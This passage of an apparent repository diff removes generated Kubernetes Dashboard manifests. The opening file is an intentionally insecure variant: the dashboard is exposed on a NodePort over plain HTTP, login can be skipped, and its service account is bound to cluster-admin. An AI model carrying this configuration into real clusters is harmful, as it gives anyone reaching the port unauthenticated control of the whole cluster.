# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Service
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
kubernetes.io/cluster-service: "true"
spec:
type: NodePort
ports:
- port: 443
targetPort: http
name: http
selector:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/deployment.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: apps/v1
kind: Deployment
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
replicas: 1
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
template:
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
containers:
- name: kubernetes-dashboard
image: "kubernetesui/dashboard:v2.3.1"
imagePullPolicy: IfNotPresent
args:
- --namespace=kubernetes-dashboard
- --metrics-provider=none
- --enable-skip-login
- --enable-insecure-login
ports:
- name: http
containerPort: 9090
protocol: TCP
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTP
path: /
port: 9090
initialDelaySeconds: 30
timeoutSeconds: 30
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
---
# Source: kubernetes-dashboard/templates/clusterrole-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/ingress.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/networkpolicy.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/pdb.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/psp.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:insecure
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -1,489 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
---
# Source: kubernetes-dashboard/templates/serviceaccount.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/secret.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# kubernetes-dashboard-certs
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-certs
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-csrf
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-csrf
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-key-holder
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-key-holder
type: Opaque
---
# Source: kubernetes-dashboard/templates/configmap.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ConfigMap
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-settings
data:
---
# Source: kubernetes-dashboard/templates/clusterrole-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/role.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
# Source: kubernetes-dashboard/templates/rolebinding.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/service.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Service
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
kubernetes.io/cluster-service: "true"
spec:
type: ClusterIP
ports:
- port: 443
targetPort: https
name: https
selector:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/deployment.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: apps/v1
kind: Deployment
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
replicas: 1
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
template:
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
containers:
- name: kubernetes-dashboard
image: "kubernetesui/dashboard:v2.3.1"
imagePullPolicy: IfNotPresent
args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --metrics-provider=none
ports:
- name: https
containerPort: 8443
protocol: TCP
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
---
# Source: kubernetes-dashboard/templates/clusterrole-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/ingress.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/networkpolicy.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/pdb.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/psp.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

View File

@@ -1,510 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
---
# Source: kubernetes-dashboard/templates/serviceaccount.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/secret.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# kubernetes-dashboard-certs
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-certs
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-csrf
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-csrf
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-key-holder
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-key-holder
type: Opaque
---
# Source: kubernetes-dashboard/templates/configmap.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ConfigMap
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-settings
data:
---
# Source: kubernetes-dashboard/templates/clusterrole-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/role.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
# Source: kubernetes-dashboard/templates/rolebinding.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/service.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Service
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
